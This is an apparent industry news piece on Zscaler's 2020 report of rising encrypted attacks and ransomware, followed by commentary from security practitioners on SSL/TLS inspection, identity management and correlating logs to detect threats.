New research by Zscaler, analyzing 6.6 billion security threats, has discovered a 260% increase in attacks during the first nine months of 2020. Among the encrypted attacks was an increase of the amount of ransomware by 500%, with the most prominent variants being FileCrypt/FileCoder, followed by Sodinokibi, Maze and Ryuk.
For most organisations, particularly SMEs with little to no resources or knowledge dedicated to cybersecurity, determining the safety of a site comes down to whether or not it has padlock symbol in the search bar. Unfortunately, while tools such as this are primarily employed to ensure privacy and data integrity, it can also be manipulated for nefarious uses. Indeed, it’s a clever trick as malicious acts are masked behind a symbol universally recognised to mean ‘secure’ and ’safe’. Organisations would benefit from deploying security defences that analyse the legitimacy of connections.
I agree that using security controls such as SSL cert to secure communications and links could support masking the threat and attack vector and this is why in-depth control frameworks are so important; Other security controls and alerts would highlight this as malicious activity for investigation. An identity and access management platform that accesses risk control from both an authentication and authorization perspective would support identifying these malicious attack attempts as risk factors would change and reduce the associated risks.
For any cybersecurity team to be successful they must have security monitoring, alerting technologies and tooling throughout their organisation’s architecture so they can identify a threat and respond accordingly to reduce business impacts and consequences, up to and including preventing a data breach. In a cybersecurity protection role this too can include the ability to monitor encrypted communication channels.
There are no privacy implications here; The definition of privacy is the permitted access to data to carry out the business requirements, and in this case access is granted to review communication channels and identify the cybersecurity threat contained within the encrypted channel. That being said, if the security team have been involved in the design and architecture of the network/communication channels using encryption, they will be implemented in a way that they can identify authentication communications to unauthorized users, along with the ability to monitor a specific communication should they need to.
Having more visibility into the SSL/TLS traffic definitely is one of the key elements needed to detect modern attacks. However, SSL/TLS inspection/termination alone is often not sufficient. To illustrate, even with SSL/TLS inspection in place, malicious threat actors (MTA) often implement additional layers of encryption and obfuscation on top of SSL/TLS and are also often leveraging legitimate sites, such as githubusercontent, cloud drives, and others, to \\\”reflect\\\”/host malicious stager payloads. One example is Trickbot/Powertrick MTA where we\\\’ve been seeing attackers download post-attack powershell stagers from SSL/TLS sites. For this reason, in addition to SSL/TLS inspection and termination, it\\\’s important to be able to monitor SSL/TLS activity in context of some of the other activity that happens in your environment from a variety of log/data sources and be able to correlate behaviours across different log/data sources effectively, especially when it comes to cloud collaboration apps.